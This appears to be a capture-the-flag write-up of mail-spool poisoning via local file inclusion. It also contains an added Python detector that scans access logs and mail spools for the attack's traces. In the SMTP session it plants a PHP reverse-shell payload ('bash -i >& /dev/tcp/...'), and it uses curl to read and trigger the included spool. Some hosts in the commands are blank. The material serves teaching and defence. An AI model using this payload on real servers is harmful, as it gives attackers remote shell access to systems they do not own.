Mail log

Example from

Since this server has an SMTP service running on port 25, we can take advantage of it to see if we can "poison" the /var/mail/*user* mail spool. For this attack to succeed, the application we are exploiting with LFI needs read access to that file. In the output below we can see that we can read the mail of the user asterisk.

└──╼ $curl -k
From asterisk@beep.localdomain Mon Jan 28 21:04:02 2019
Return-Path: <asterisk@beep.localdomain>
X-Original-To: asterisk
Delivered-To: asterisk@beep.localdomain
Received: by beep.localdomain (Postfix, from userid 100)
id 1BBB2D9301; Mon, 28 Jan 2019 21:04:02 +0200 (EET)
From: root@beep.localdomain (Cron Daemon)
To: asterisk@beep.localdomain
Subject: Cron <asterisk@beep> /var/lib/asterisk/bin/freepbx-cron-scheduler.php
Content-Type: text/plain; charset=UTF-8
Auto-Submitted: auto-generated
X-Cron-Env: <SHELL=/bin/sh>
X-Cron-Env: <HOME=/var/lib/asterisk>
X-Cron-Env: <PATH=/usr/bin:/bin>
X-Cron-Env: <LOGNAME=asterisk>
X-Cron-Env: <USER=asterisk>
Message-Id: <20190128190402.1BBB2D9301@beep.localdomain>
Date: Mon, 28 Jan 2019 21:02:01 +0200 (EET)
Mon, 28 Jan 2019 21:02:01 +0200 - Got event.. fullybooted
Mon, 28 Jan 2019 21:02:01 +0200 - No event handler for event 'fullybooted'
From asterisk@beep.localdomain Tue Jan 29 21:04:01 2019
Return-Path: <asterisk@beep.localdomain>
X-Original-To: asterisk
Delivered-To: asterisk@beep.localdomain

By connecting to the SMTP server we can also send PHP code in the hope that the server will execute it when the mail spool is included. In this case we have sent the mail to the user asterisk, with the body containing instructions for a reverse shell:

└──╼ $telnet 25
Connected to
Escape character is '^]'.
220 beep.localdomain ESMTP Postfix
250-SIZE 10240000
250 DSN
mail from:
250 2.1.0 Ok
rcpt to: asterisk@localhost
250 2.1.5 Ok
354 End data with <CR><LF>.<CR><LF>
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/ 0>&1'");?>
250 2.0.0 Ok: queued as 399A4D9301
221 2.0.0 Bye
Connection closed by foreign host.

Once the mail has been sent, all we need to do to test our theory is to send the GET request once again to the address below to trigger the shell (if successful, the GET request will hang):

curl -k
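The two halves of this technique leave distinct traces a defender can check for: the web access log records the file parameter being steered at the mail spool, and the spool itself ends up holding a message whose body contains a PHP open tag. The script below is an added example, not code from the original writeup; it runs over constructed sample data (the hostnames, addresses, the `view.php?page=` endpoint and the Message-Ids are invented), decodes the query parameter repeatedly so a double-encoded `..%252f` is not missed, and splits an mbox-style spool on its `From ` separator lines to inspect each message body.

```python
"""Defensive checks for the two sides of mail-spool poisoning via LFI:
(1) web requests whose file parameter points at a log or mail file, and
(2) messages in a mail spool whose body carries PHP tags.
Added example with constructed sample data; not part of the original writeup."""
import re
from email import message_from_string
from urllib.parse import parse_qsl, unquote, urlsplit

# Files an LFI is commonly steered at so that attacker-controlled text gets included.
SENSITIVE_PREFIXES = ("/var/mail/", "/var/spool/mail/", "/var/log/", "/proc/self/")
PHP_OPEN_TAG = re.compile(r"<\?(?:php\b|=)", re.IGNORECASE)
# Apache combined-style line: ip ident user [ts] "METHOD target PROTO" status size
ACCESS_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) \S+$'
)

# Constructed access-log lines (hypothetical endpoint and parameter name).
SAMPLE_ACCESS_LOG = """\
10.0.0.5 - - [28/Jan/2019:21:05:11 +0200] "GET /view.php?page=home HTTP/1.1" 200 512
10.0.0.9 - - [28/Jan/2019:21:06:02 +0200] "GET /view.php?page=../../../../var/mail/asterisk%00 HTTP/1.1" 200 2048
10.0.0.9 - - [28/Jan/2019:21:06:30 +0200] "GET /view.php?page=..%252f..%252fvar%252flog%252fhttpd%252faccess_log HTTP/1.1" 200 9000
"""

# Constructed mbox-style spool, modeled on the cron mail shown in the writeup (addresses invented).
SAMPLE_MBOX = """\
From asterisk@example.invalid Mon Jan 28 21:04:02 2019
Return-Path: <asterisk@example.invalid>
From: root@example.invalid (Cron Daemon)
To: asterisk@example.invalid
Subject: Cron <asterisk@beep> /var/lib/asterisk/bin/freepbx-cron-scheduler.php
Message-Id: <constructed-0001@example.invalid>

Mon, 28 Jan 2019 21:02:01 +0200 - Got event.. fullybooted

From sender@example.invalid Tue Jan 29 21:04:01 2019
Return-Path: <sender@example.invalid>
From: sender@example.invalid
To: asterisk@example.invalid
Subject: hello
Message-Id: <constructed-0002@example.invalid>

<?php echo "planted"; ?>

"""


def fully_decode(value, rounds=3):
    """Percent-decode repeatedly so double-encoded traversal (..%252f) is caught."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def classify_param(value):
    """Return the reasons (in fixed order) a parameter value looks like an LFI probe."""
    decoded = fully_decode(value).replace("\\", "/")
    reasons = []
    if "../" in decoded:
        reasons.append("traversal")
    if any(prefix in decoded for prefix in SENSITIVE_PREFIXES):
        reasons.append("sensitive-file")
    if "\x00" in decoded:
        reasons.append("null-byte")
    return reasons


def scan_access_log(text):
    """One finding per request whose query carries at least one suspicious value."""
    findings = []
    for line in text.splitlines():
        match = ACCESS_LINE.match(line)
        if not match:
            continue
        query = urlsplit(match.group("target")).query
        for name, value in parse_qsl(query, keep_blank_values=True):
            reasons = classify_param(value)
            if reasons:
                findings.append({"ip": match.group("ip"), "param": name, "reasons": reasons})
    return findings


def scan_mbox(text):
    """Messages whose body contains a PHP open tag; messages are split on mbox 'From ' lines."""
    findings = []
    for chunk in re.split(r"(?m)^From .*\n", text):
        if not chunk.strip():
            continue
        msg = message_from_string(chunk)
        for part in msg.walk():
            if part.is_multipart():
                continue
            body = part.get_payload(decode=True) or b""
            if PHP_OPEN_TAG.search(body.decode("utf-8", "replace")):
                findings.append({"message_id": msg["Message-Id"], "from": msg["From"],
                                 "subject": msg["Subject"]})
                break
    return findings


if __name__ == "__main__":
    for finding in scan_access_log(SAMPLE_ACCESS_LOG):
        print("LFI probe:", finding)
    for finding in scan_mbox(SAMPLE_MBOX):
        print("PHP in spool:", finding)
```

Run it as a script to see both findings; in practice you would feed it the real access log and the spool files under /var/mail. The decode loop matters: a single `unquote` turns `..%252f` into `..%2f`, which contains no `../` and would slip past a naive check, while the second pass yields the real traversal string.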

Successful reverse shell through Apache log poisoning: